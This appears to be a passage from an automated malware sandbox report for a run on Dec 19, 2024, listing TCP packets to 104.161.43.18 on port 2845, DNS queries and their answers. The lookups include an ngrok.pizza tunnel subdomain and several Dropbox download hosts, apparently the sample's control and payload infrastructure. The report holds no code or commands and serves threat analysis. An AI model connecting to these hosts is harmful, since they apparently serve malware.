                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.813474894 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.814687967 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.814703941 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.814795971 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.815296888 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.815345049 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.829617977 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.873701096 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.949239969 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.993310928 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:41.872960091 CET4970480192.168.2.6199.232.210.172
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:42.101159096 CET8049704199.232.210.172192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:42.101279020 CET4970480192.168.2.6199.232.210.172

                                                                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:10.488238096 CET6309453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:10.626919031 CET53630941.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:14.276416063 CET5754453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:14.413319111 CET53575441.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.205912113 CET5111253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.498696089 CET53511121.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.078597069 CET5489853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.379812956 CET53548981.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.407768011 CET5702953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.408180952 CET6020953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.545255899 CET53570291.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.545299053 CET53602091.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:27.768918991 CET6420153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:27.769066095 CET5262453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.234127998 CET5154853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.234385967 CET5317753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.347269058 CET5746453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.350728989 CET5333353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.350905895 CET6302553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.372498989 CET53531771.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.372709990 CET53515481.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.636998892 CET53630251.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.640610933 CET53574641.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.640805006 CET53533331.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.822312117 CET5683253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.822493076 CET6012153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.822868109 CET6158853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.823029041 CET5811453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.832470894 CET6318653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.832777977 CET5324153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.959394932 CET53601211.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.959409952 CET53568321.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.959604979 CET53615881.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.960530996 CET53581141.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.969902039 CET53532411.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.970067978 CET53631861.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.377777100 CET5854153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.779083967 CET53585411.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.797681093 CET63573443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.813898087 CET52674443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.105761051 CET63573443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.121546984 CET52674443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.760632038 CET63573443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.761264086 CET52674443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.882944107 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.882962942 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.883063078 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.883075953 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.899180889 CET44352674162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.899194002 CET44352674162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.899207115 CET44352674162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.899286032 CET44352674162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.939721107 CET63573443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.940924883 CET63573443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.943512917 CET63573443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.944072962 CET63573443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.944729090 CET52674443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.947793961 CET52674443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.949338913 CET63573443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.949604988 CET52674443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.074558973 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.075217962 CET44352674162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.257671118 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.257807016 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.257817030 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.257827044 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.260421991 CET63573443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.260724068 CET63573443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.261419058 CET44352674162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.261504889 CET44352674162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.261513948 CET44352674162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.261523008 CET44352674162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.261979103 CET52674443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.262084007 CET52674443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.264414072 CET44352674162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.266272068 CET44352674162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.267091990 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.267604113 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.268686056 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.268697023 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.268707037 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.269083023 CET63573443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.269447088 CET63573443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.285406113 CET44352674162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.287811041 CET52674443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.574969053 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.577121019 CET44352674162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.665672064 CET52674443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:34.665714979 CET63573443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:39.800972939 CET6093353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:40.095621109 CET53609331.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:48.635881901 CET63573443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:48.636317015 CET63573443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:48.950054884 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:48.962559938 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:48.962616920 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:48.965634108 CET63573443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:51.363051891 CET63573443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:51.363892078 CET63573443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:51.365053892 CET52674443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:51.365726948 CET52674443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:51.677898884 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:51.678342104 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:51.678591967 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:51.679538965 CET44363573172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:51.680123091 CET44352674162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:51.680622101 CET63573443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:51.681314945 CET44352674162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:51.681619883 CET44352674162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:51.681901932 CET52674443192.168.2.6162.159.61.3

                                                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:10.488238096 CET192.168.2.61.1.1.10x983dStandard query (0)23glcrtmzxqgwfpq3oujitt.ngrok.pizzaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:14.276416063 CET192.168.2.61.1.1.10xcd13Standard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.205912113 CET192.168.2.61.1.1.10x4177Standard query (0)ucf22feba25dd3a3196337a0818f.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.078597069 CET192.168.2.61.1.1.10xa478Standard query (0)ucdd9b13509f51c836fc413bce70.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.407768011 CET192.168.2.61.1.1.10x3a8eStandard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.408180952 CET192.168.2.61.1.1.10x43aeStandard query (0)www.dropbox.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:27.768918991 CET192.168.2.61.1.1.10x4338Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:27.769066095 CET192.168.2.61.1.1.10xbe95Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.234127998 CET192.168.2.61.1.1.10x8cd5Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.234385967 CET192.168.2.61.1.1.10x5e87Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.347269058 CET192.168.2.61.1.1.10x49aeStandard query (0)ucdccc1744965d58711471073024.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.350728989 CET192.168.2.61.1.1.10xed49Standard query (0)ucdccc1744965d58711471073024.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.350905895 CET192.168.2.61.1.1.10xdb55Standard query (0)ucdccc1744965d58711471073024.dl.dropboxusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.822312117 CET192.168.2.61.1.1.10x8ad4Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.822493076 CET192.168.2.61.1.1.10x5513Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.822868109 CET192.168.2.61.1.1.10xad79Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.823029041 CET192.168.2.61.1.1.10x898dStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.832470894 CET192.168.2.61.1.1.10xc635Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.832777977 CET192.168.2.61.1.1.10x1c3bStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.377777100 CET192.168.2.61.1.1.10xe169Standard query (0)ucff4ea26bff00b5ef56c95e397d.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:39.800972939 CET192.168.2.61.1.1.10xb59bStandard query (0)uccb79179262a53ec7922db7f8b0.dl.dropboxusercontent.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:04.391782999 CET1.1.1.1192.168.2.60x70a8No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:04.391782999 CET1.1.1.1192.168.2.60x70a8No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:10.626919031 CET1.1.1.1192.168.2.60x983dNo error (0)23glcrtmzxqgwfpq3oujitt.ngrok.pizza3.124.142.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:10.626919031 CET1.1.1.1192.168.2.60x983dNo error (0)23glcrtmzxqgwfpq3oujitt.ngrok.pizza3.125.209.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:10.626919031 CET1.1.1.1192.168.2.60x983dNo error (0)23glcrtmzxqgwfpq3oujitt.ngrok.pizza18.192.31.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:10.626919031 CET1.1.1.1192.168.2.60x983dNo error (0)23glcrtmzxqgwfpq3oujitt.ngrok.pizza18.158.249.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:10.626919031 CET1.1.1.1192.168.2.60x983dNo error (0)23glcrtmzxqgwfpq3oujitt.ngrok.pizza3.125.223.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:10.626919031 CET1.1.1.1192.168.2.60x983dNo error (0)23glcrtmzxqgwfpq3oujitt.ngrok.pizza3.125.102.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:14.413319111 CET1.1.1.1192.168.2.60xcd13No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:14.413319111 CET1.1.1.1192.168.2.60xcd13No error (0)www-env.dropbox-dns.com162.125.69.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.498696089 CET1.1.1.1192.168.2.60x4177No error (0)ucf22feba25dd3a3196337a0818f.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.498696089 CET1.1.1.1192.168.2.60x4177No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.379812956 CET1.1.1.1192.168.2.60xa478No error (0)ucdd9b13509f51c836fc413bce70.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.379812956 CET1.1.1.1192.168.2.60xa478No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.545255899 CET1.1.1.1192.168.2.60x3a8eNo error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.545255899 CET1.1.1.1192.168.2.60x3a8eNo error (0)www-env.dropbox-dns.com162.125.69.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.545299053 CET1.1.1.1192.168.2.60x43aeNo error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.548049927 CET1.1.1.1192.168.2.60x8b9eNo error (0)svc.ha-teams.office.commira-tmc.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.549243927 CET1.1.1.1192.168.2.60x7f83No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.549243927 CET1.1.1.1192.168.2.60x7f83No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.549541950 CET1.1.1.1192.168.2.60xa2f1No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:27.905971050 CET1.1.1.1192.168.2.60xbe95No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:27.907527924 CET1.1.1.1192.168.2.60x4338No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.372498989 CET1.1.1.1192.168.2.60x5e87No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.372709990 CET1.1.1.1192.168.2.60x8cd5No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.372709990 CET1.1.1.1192.168.2.60x8cd5No error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.636998892 CET1.1.1.1192.168.2.60xdb55No error (0)ucdccc1744965d58711471073024.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.640610933 CET1.1.1.1192.168.2.60x49aeNo error (0)ucdccc1744965d58711471073024.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.640610933 CET1.1.1.1192.168.2.60x49aeNo error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.640805006 CET1.1.1.1192.168.2.60xed49No error (0)ucdccc1744965d58711471073024.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.640805006 CET1.1.1.1192.168.2.60xed49No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.959394932 CET1.1.1.1192.168.2.60x5513No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.959409952 CET1.1.1.1192.168.2.60x8ad4No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.959409952 CET1.1.1.1192.168.2.60x8ad4No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.959604979 CET1.1.1.1192.168.2.60xad79No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.959604979 CET1.1.1.1192.168.2.60xad79No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.960530996 CET1.1.1.1192.168.2.60x898dNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.969902039 CET1.1.1.1192.168.2.60x1c3bNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.970067978 CET1.1.1.1192.168.2.60xc635No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.970067978 CET1.1.1.1192.168.2.60xc635No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.779083967 CET1.1.1.1192.168.2.60xe169No error (0)ucff4ea26bff00b5ef56c95e397d.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.779083967 CET1.1.1.1192.168.2.60xe169No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:40.095621109 CET1.1.1.1192.168.2.60xb59bNo error (0)uccb79179262a53ec7922db7f8b0.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:40.095621109 CET1.1.1.1192.168.2.60xb59bNo error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:27.736484051 CET1.1.1.1192.168.2.60xc936No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:27.736484051 CET1.1.1.1192.168.2.60xc936No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:28.740256071 CET1.1.1.1192.168.2.60xc936No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:28.740256071 CET1.1.1.1192.168.2.60xc936No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:29.749737978 CET1.1.1.1192.168.2.60xc936No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:29.749737978 CET1.1.1.1192.168.2.60xc936No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:31.756407976 CET1.1.1.1192.168.2.60xc936No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:31.756407976 CET1.1.1.1192.168.2.60xc936No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:35.771380901 CET1.1.1.1192.168.2.60xc936No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
